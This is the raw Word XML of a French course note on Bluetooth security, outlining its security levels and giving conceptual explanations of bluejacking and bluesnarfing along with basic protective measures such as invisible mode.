      </w:r>
    </w:p>
    <w:p w14:paraId="36209844" w14:textId="77777777" w:rsidR="000D4674" w:rsidRDefault="000D4674" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B4F839" w14:textId="77777777" w:rsidR="000D4674" w:rsidRDefault="000D4674" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139371A1" w14:textId="1B7E349C" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Chapitre 3 : Sécurité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2878E2" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF"/>
    <w:p w14:paraId="49B3D90C" w14:textId="2734C0B2" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:r>
        <w:t xml:space="preserve">Il y a trois niveaux de sécurité dans le Bluetooth : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB5F229" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF"/>
    <w:p w14:paraId="5D24EDF8" w14:textId="3C738185" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pas de gestion de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE12080" w14:textId="0085E02B" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestion de la sécurité au niveau applicatif </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(identification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD80BC7" w14:textId="1F87F1DF" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestion de sécurité au niveau liaison Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4CB7D" w14:textId="62F63A45" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mise en place d’in processus d’authentification </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CF72B4" w14:textId="43FD298D" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Suivi ou non par un chiffrent à l’aide de clés privés </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ADB2DE" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF"/>
    <w:p w14:paraId="4C96C20F" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF"/>
    <w:p w14:paraId="59BD1CBF" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF"/>
    <w:p w14:paraId="3F762997" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:r>
        <w:t>L’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>algorythme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de sécurité </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utilse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607D14FE" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF"/>
    <w:p w14:paraId="3CC534B9" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le numéro d’identité du terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351CF585" w14:textId="65737CE0" w:rsidR="009367FF" w:rsidRDefault="006C2550" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Une clé privée</w:t>
      </w:r>
      <w:r w:rsidR="009367FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2F75E" w14:textId="2BE4AEE6" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Un générateur aléatoire interne à la puce Bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD63D9" w14:textId="4352BF80" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour chaque transaction, un nouveau numéro aléatoire est tiré pour chiffrer les données à transmettre </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BEC123" w14:textId="45296505" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00635AE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scatternet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(réseau ad hoc)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2942FEB5" w14:textId="0C3A0A63" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il faut procéder au début de la mise en relation, à un échange de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cléf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> privées entre les processus de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>piconnets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">(utilisateur de réseau </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ah</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> hoc)</w:t>
      </w:r>
      <w:r w:rsidRPr="009367FF">
        <w:t xml:space="preserve"> indépendant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8D7952" w14:textId="77777777" w:rsidR="006C2550" w:rsidRDefault="006C2550" w:rsidP="006C2550"/>
    <w:p w14:paraId="2AD79CB7" w14:textId="5EAF7BA3" w:rsidR="006C2550" w:rsidRDefault="006C2550" w:rsidP="006C2550">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Chapitre 4 : attaques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F470C7E" w14:textId="31FB6CEF" w:rsidR="006C2550" w:rsidRDefault="006C2550" w:rsidP="006C2550">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bluejacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2716EF37" w14:textId="77777777" w:rsidR="006C2550" w:rsidRDefault="006C2550" w:rsidP="006C2550"/>
    <w:p w14:paraId="00D74CF1" w14:textId="77777777" w:rsidR="006C2550" w:rsidRPr="006C2550" w:rsidRDefault="006C2550" w:rsidP="006C2550"/>
    <w:p w14:paraId="6AA2927A" w14:textId="75BF4AE0" w:rsidR="006C2550" w:rsidRDefault="006C2550" w:rsidP="00E14CE2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bluejacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est une attaque relativement inoffensive lors de laquelle un pirate envoie des messages non sollicités à des appareils détectables dans la zone. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF1560" w14:textId="77777777" w:rsidR="006C2550" w:rsidRDefault="006C2550" w:rsidP="006C2550">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B81D001" w14:textId="68CF7FE1" w:rsidR="006C2550" w:rsidRDefault="00E14CE2" w:rsidP="00E14CE2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaque est menée en exploitant la fonction de carte de visite électronique </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> comme support de message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F8F20" w14:textId="77777777" w:rsidR="00E14CE2" w:rsidRDefault="00E14CE2" w:rsidP="006C2550">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E59EA6" w14:textId="2A8B9C1C" w:rsidR="00E14CE2" w:rsidRDefault="00E14CE2" w:rsidP="00E14CE2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le pirate informatique ne peut accéder à aucune information ni intercepter aucun message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532AC28" w14:textId="77777777" w:rsidR="006C2550" w:rsidRDefault="006C2550" w:rsidP="006C2550"/>
    <w:p w14:paraId="5843CDEC" w14:textId="77777777" w:rsidR="00E14CE2" w:rsidRDefault="00E14CE2" w:rsidP="006C2550"/>
    <w:p w14:paraId="73BBD9AE" w14:textId="029B4E2F" w:rsidR="00E14CE2" w:rsidRDefault="00E14CE2" w:rsidP="006C2550">
      <w:r>
        <w:t xml:space="preserve">Vous pouvez vous protéger de ces spams non sollicités en mettant votre téléphone en mode caché, en mode invisible ou en mode non détectable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4695108F" w14:textId="77777777" w:rsidR="00E14CE2" w:rsidRDefault="00E14CE2" w:rsidP="006C2550"/>
    <w:p w14:paraId="76DF9C95" w14:textId="236DBBC6" w:rsidR="00E14CE2" w:rsidRDefault="00E14CE2" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14CE2">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Le Blue </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E14CE2">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>jacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E14CE2">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> n’est donc ni plus ni moins qu’une méthode de pirata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">ge qui permet à un individu </w:t>
      </w:r>
      <w:r w:rsidR="002C115C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>d’envoyer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C115C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">des messages anonymes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">à une appareil </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans nu certains rayon. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4AA31" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448D3066" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C9AC5A" w14:textId="733A167C" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Tout d’abord, le pirate analyse son environnement à l’aide d’un appareil compatible </w:t>
      </w:r>
      <w:r w:rsidR="00A41325">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">luetooth, à la recherche d’autres </w:t>
      </w:r>
      <w:r w:rsidR="00A41325">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>appareils</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>. En</w:t>
      </w:r>
      <w:r w:rsidR="00A41325">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">suites il envoie un message non sollicité aux périphérique détectés. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B49D92F" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717A34C2" w14:textId="00120519" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Le Bluejacking exploite une fonction Bluetooth de vase qui permet aux appareils d’envoyer des messages à des contacts à portés. Il ne permet pas le détournement complet de l’appareil. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D95461" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FCC596D" w14:textId="713EAAF0" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Le pirate ne peut qu’envoyer des messages non </w:t>
      </w:r>
      <w:r w:rsidR="00A41325">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sollicités</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Détournement ne se produit pas réellement parce que l’agresseur n’a jamais le contrôle de l’appareil de la victime. AU pire, </w:t>
      </w:r>
      <w:r w:rsidR="00A41325">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">luejacking est juste une sorte de SPAM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F25EB2" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C6635F" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B860E3" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38AEED75" w14:textId="65C3EB59" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="002C115C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bluesnarfing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38093126" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="002C115C"/>
    <w:p w14:paraId="059E4982" w14:textId="3546FA59" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="002C115C">
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r w:rsidR="003F2034">
        <w:t xml:space="preserve">Bluesnarfing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est bien pire que le </w:t>
      </w:r>
      <w:r w:rsidR="00A41325">
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>luejacking car il permet à un hacker d’</w:t>
      </w:r>
      <w:r w:rsidR="004D256A">
        <w:t>accéder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> à certaines de vos informations privées. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D9A09" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="002C115C"/>
    <w:p w14:paraId="6DF0B3F4" w14:textId="50E33136" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="002C115C">
      <w:r>
        <w:t xml:space="preserve">Dans ce type d’attaques, un pirate informatique utilise un logiciel spécial pour demander des </w:t>
      </w:r>
      <w:r w:rsidR="004D256A">
        <w:t>informations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> à un appareil via le profil </w:t>
      </w:r>
      <w:r w:rsidR="00A41325">
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">luetooth OBEX push. Cette attaque peut être effectuée contre des périphériques en mode invisibles mais cela demande un temps considérable pour u parvenir. Sans connaître le nom du périphérique. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DBBD46" w14:textId="77777777" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="002C115C"/>
    <w:p w14:paraId="6052AB53" w14:textId="2C72DAD9" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r w:rsidR="003F2034">
        <w:t xml:space="preserve">Bluesnarfing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est donc un piratage de périphérique effectué lorsqu’un périphérique sans fil compatible Bluetooth reste constamment en mode découverte. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B491CF4" w14:textId="77777777" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A"/>
    <w:p w14:paraId="7D8BD81B" w14:textId="00B903F4" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A">
      <w:r>
        <w:t xml:space="preserve">Il permet aux </w:t>
      </w:r>
      <w:r w:rsidR="00EB280C">
        <w:t>pirates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d’accéder à distant aux données des périphériques </w:t>
      </w:r>
      <w:r w:rsidR="00EB280C">
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">luetooth, telles que : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B227BC" w14:textId="77777777" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A"/>
    <w:p w14:paraId="7D8CC250" w14:textId="21A6EB6E" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Le calend</w:t>
      </w:r>
      <w:r w:rsidR="002D5BEE">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ier </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8763DD" w14:textId="6DC3FAB5" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>La liste de contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5018499D" w14:textId="00084143" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les emails </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192C2F9" w14:textId="3DC42FE9" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les textos de l’utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC88F5" w14:textId="77777777" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A"/>
    <w:p w14:paraId="548331C1" w14:textId="1AF231EF" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A">
      <w:r>
        <w:t xml:space="preserve">Cette attaque est </w:t>
      </w:r>
      <w:r w:rsidR="00EB280C">
        <w:t>perpétrée</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> à l’insu de la victime. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDA232" w14:textId="77777777" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A"/>
    <w:p w14:paraId="170B74EB" w14:textId="4D427FBD" w:rsidR="004D256A" w:rsidRDefault="004D256A" w:rsidP="004D256A">
      <w:r>
        <w:t xml:space="preserve">Les périphériques </w:t>
      </w:r>
      <w:r w:rsidR="002D5BEE">
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">luetooth sont vulnérables aux attaques de </w:t>
      </w:r>
      <w:r w:rsidR="003F2034">
        <w:t xml:space="preserve">Bluesnarfing </w:t>
      </w:r>
      <w:r w:rsidR="002D5BEE">
        <w:t>lorsqu’ils sont</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en mode découvrables car les pirates peuvent répondre aux requêtes d</w:t>
      </w:r>
      <w:r w:rsidR="002D5BEE">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">autre périphérique </w:t>
      </w:r>
      <w:r w:rsidR="002D5BEE">
        <w:t xml:space="preserve">Bluetooth. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144EB74B" w14:textId="77777777" w:rsidR="002D5BEE" w:rsidRDefault="002D5BEE" w:rsidP="004D256A"/>
    <w:p w14:paraId="18B6C622" w14:textId="58724ED3" w:rsidR="002D5BEE" w:rsidRDefault="002D5BEE" w:rsidP="004D256A">
      <w:r>
        <w:t xml:space="preserve">La plupart des modes de découvertes des téléphones mobiles sont activés par défaut. A moins que le mode ne soit désactivé, in dispositif est donc par défaut sensible aux attaques de Buesnarfing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C1E71" w14:textId="77777777" w:rsidR="002D5BEE" w:rsidRDefault="002D5BEE" w:rsidP="004D256A"/>
    <w:p w14:paraId="05C7B84F" w14:textId="0B2B4563" w:rsidR="002D5BEE" w:rsidRDefault="002D5BEE" w:rsidP="002D5BEE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La seule façon de protéger complètement un appareil sans fil contre le </w:t>
      </w:r>
      <w:r w:rsidR="003F2034">
        <w:t xml:space="preserve">Bluesnarfing </w:t>
      </w:r>
      <w:r>
        <w:t>est de désactivé le Bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72734027" w14:textId="697C0865" w:rsidR="002D5BEE" w:rsidRDefault="002D5BEE" w:rsidP="002D5BEE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De même, le fait de garder son téléphone en mode invisible offre une certaine protection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CB22D2" w14:textId="4F014A18" w:rsidR="00B20CBE" w:rsidRDefault="00B20CBE" w:rsidP="002D5BEE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
